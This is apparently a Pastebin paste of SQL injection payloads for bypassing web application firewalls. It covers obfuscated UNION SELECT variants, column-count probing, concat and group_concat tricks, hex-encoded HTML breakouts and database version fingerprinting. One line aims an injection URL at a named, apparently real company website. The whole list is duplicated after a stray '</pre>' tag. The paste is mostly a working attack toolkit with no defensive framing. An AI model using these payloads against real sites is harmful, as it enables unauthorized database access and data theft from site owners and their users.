Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ) order by 1-- -
- ') order by 1-- -
- ')order by 1%23%23
- %')order by 1%23%23
- Null' order by 100--+
- Null' order by 9999--+
- ')group by 99-- -
- 'group by 119449-- -
- 'group/**/by/**/99%23%23
- union select ByPassing method
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- +/*!u%6eion*/+/*!se%6cect*/+
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- %55nion %53elect
- +--+Union+--+Select+--+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- UnIoN SeLeCt CoNcAt(version())--
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- ============================================================================
- :: 400 Bad Request ::
- ============================================================================
- –+%0A
- union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
- ===========================================================================
- null the parameter
- ===========================================================================
- id=-1
- id=null
- id=1+and+false+
- id=9999
- id=1 and 0
- id==1
- id=(-1)
- ==========================================================================
- Group_Concat
- ==========================================================================
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- ==========================================================================
- To appear column numbr in page put after id
- ==========================================================================
- id=1+and+1=0+union+select+1,2,3,4,5,6
- +AND+1=0
- /*!aND*/ 1 like 0
- +/*!and*/+1=0
- +and+2>3+
- +and(1)=(0)
- and (1)!=(0)
- +div+0
- Having+1=0
- ==========================================================================
- function ByPassing
- ==========================================================================
- unhex(hex(value))
- cast(value as char)
- uncompress(compress(version()))
- cast(version() as char)
- aes_decrypt(aes_encrypt(version(),1),1)
- binary(version())
- convert(value using ascii)
- ===========================================================================
- avoid source page injection
- ===========================================================================
- FullSecurity.org
- concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
- “><br>? <img src=”
- <img src=””/>injection<img src=”
- concat(0x223e,@@version)
- concat(0x273e27,version(),0x3c212d2d)
- concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
- concat(0x223e,@@version,0x3c696d67207372633d22)
- concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
- concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
- concat(‘</title>’,@@version,’<title>’)
- concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
- concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
- ============================================================================
- get version – DB_NAME – user – HOST_NAME – datadir
- ============================================================================
- FullSecurity.org
- version()
- convert(version() using latin1)
- unhex(hex(version()))
- @@GLOBAL.VERSION
- (substr(@@version,1,1)=5) :: 1 true 0 fals
- # like #
- http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
- ===========================================================================
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- id=1 /*!40123 1=1*/–+- no error
- id=1 /*!40122rrrr*/ no error
- FullSecurity.org</pre> ) order by 1-- -
- ') order by 1-- -
- ')order by 1%23%23
- %')order by 1%23%23
- Null' order by 100--+
- Null' order by 9999--+
- ')group by 99-- -
- 'group by 119449-- -
- 'group/**/by/**/99%23%23
- union select ByPassing method
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- +/*!u%6eion*/+/*!se%6cect*/+
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- %55nion %53elect
- +--+Union+--+Select+--+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- UnIoN SeLeCt CoNcAt(version())--
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- ============================================================================
- :: 400 Bad Request ::
- ============================================================================
- –+%0A
- union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
- ===========================================================================
- null the parameter
- ===========================================================================
- id=-1
- id=null
- id=1+and+false+
- id=9999
- id=1 and 0
- id==1
- id=(-1)
- ==========================================================================
- Group_Concat
- ==========================================================================
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- ==========================================================================
- To appear column numbr in page put after id
- ==========================================================================
- id=1+and+1=0+union+select+1,2,3,4,5,6
- +AND+1=0
- /*!aND*/ 1 like 0
- +/*!and*/+1=0
- +and+2>3+
- +and(1)=(0)
- and (1)!=(0)
- +div+0
- Having+1=0
- ==========================================================================
- function ByPassing
- ==========================================================================
- unhex(hex(value))
- cast(value as char)
- uncompress(compress(version()))
- cast(version() as char)
- aes_decrypt(aes_encrypt(version(),1),1)
- binary(version())
- convert(value using ascii)
- ===========================================================================
- avoid source page injection
- ===========================================================================
- FullSecurity.org
- concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
- “><br>? <img src=”
- <img src=””/>injection<img src=”
- concat(0x223e,@@version)
- concat(0x273e27,version(),0x3c212d2d)
- concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
- concat(0x223e,@@version,0x3c696d67207372633d22)
- concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
- concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
- concat(‘</title>’,@@version,’<title>’)
- concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
- concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
- ============================================================================
- get version – DB_NAME – user – HOST_NAME – datadir
- ============================================================================
- FullSecurity.org
- version()
- convert(version() using latin1)
- unhex(hex(version()))
- @@GLOBAL.VERSION
- (substr(@@version,1,1)=5) :: 1 true 0 fals
- # like #
- http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
- ===========================================================================
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- id=1 /*!40123 1=1*/–+- no error
- id=1 /*!40122rrrr*/ no error
- FullSecurity.org</pre>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement